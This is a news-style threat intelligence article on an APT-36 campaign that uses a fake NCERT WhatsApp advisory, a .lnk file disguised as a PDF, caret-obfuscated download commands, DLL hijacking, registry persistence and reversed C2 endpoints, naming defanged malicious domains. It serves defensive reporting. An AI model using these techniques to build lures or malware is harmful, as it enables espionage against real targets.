Ddos 
The sophisticated threat group APT-36 is hacking government systems by warning them about hackers. A new intelligence report from CYFIRMA exposes a targeted espionage campaign where the attackers weaponize a fake government advisory about “Fraudulent WhatsApp Messages” to deliver a potent backdoor.
This campaign highlights a dangerous evolution in social engineering, where threat actors exploit the very security awareness of their victims to compromise them.
The attack begins with a classic bait-and-switch. Victims receive what appears to be a critical security update: a file named NCERT-Whatsapp-Advisory.pdf. The lure is timely and alarming, mimicking an official warning about a malicious WhatsApp campaign targeting high-level officials.
However, the file is a mirage. It is not a PDF at all, but a malicious Windows shortcut (.lnk) file. By exploiting the default Windows setting that hides file extensions, the attackers trick users into double-clicking what they believe is a document.
“The campaign employs a deceptive government advisory lure, delivered as a malicious Windows shortcut file disguised as a PDF document, to initiate infection and evade user suspicion,” the report explains.
Once clicked, the shortcut doesn’t open a PDF reader—at least not immediately. Instead, it triggers a hidden command prompt. The attackers use a technique called command-line obfuscation, inserting caret symbols (^) between every letter of their command to blind antivirus software.
“The command string is deliberately encoded by inserting the caret (^) character after each letter, a simple but effective obfuscation technique to evade casual inspection”.
This hidden command reaches out to a compromised domain—aeroclubofindia[.]co[.]in—to download and install an MSI payload, all while the user remains oblivious.
To keep the victim calm, the malware performs a sleight of hand. While the infection takes root in the background, the malware drops and opens a legitimate-looking decoy PDF. This document, titled “NCERT Advisory: Fraudulent WhatsApp Message Campaign,” contains convincing details about a fake meeting chaired by the Prime Minister.
“While presenting legitimate-looking content to the victim, the malware silently establishes long-term access and enables remote command execution”.
Under the hood, the malware is a complex, multi-stage framework designed for long-term espionage. It deploys a .NET-based loader (ConsoleApp1.exe) that performs several malicious tasks:
- DLL Hijacking: It drops a malicious wininet.dll to intercept network traffic and establish control.
- Persistence: It creates a hidden HTML Application (HTA) file that modifies the Windows Registry, ensuring the malware starts every time the computer reboots.
The malware communicates with its command-and-control (C2) servers using “reversed” endpoints (e.g., /retsiger instead of /register) to evade detection systems looking for standard keywords.
Although the specific C2 infrastructure (wmiprovider[.]com) was inactive during the analysis, the persistence mechanisms installed on victim machines mean the threat can be reactivated at any moment.
“This activity highlights APT-36’s continued use of trusted advisory-themed lures and underscores the need for proactive, intelligence-led defense to identify and disrupt such campaigns at an early stage,” the report warns.
Donate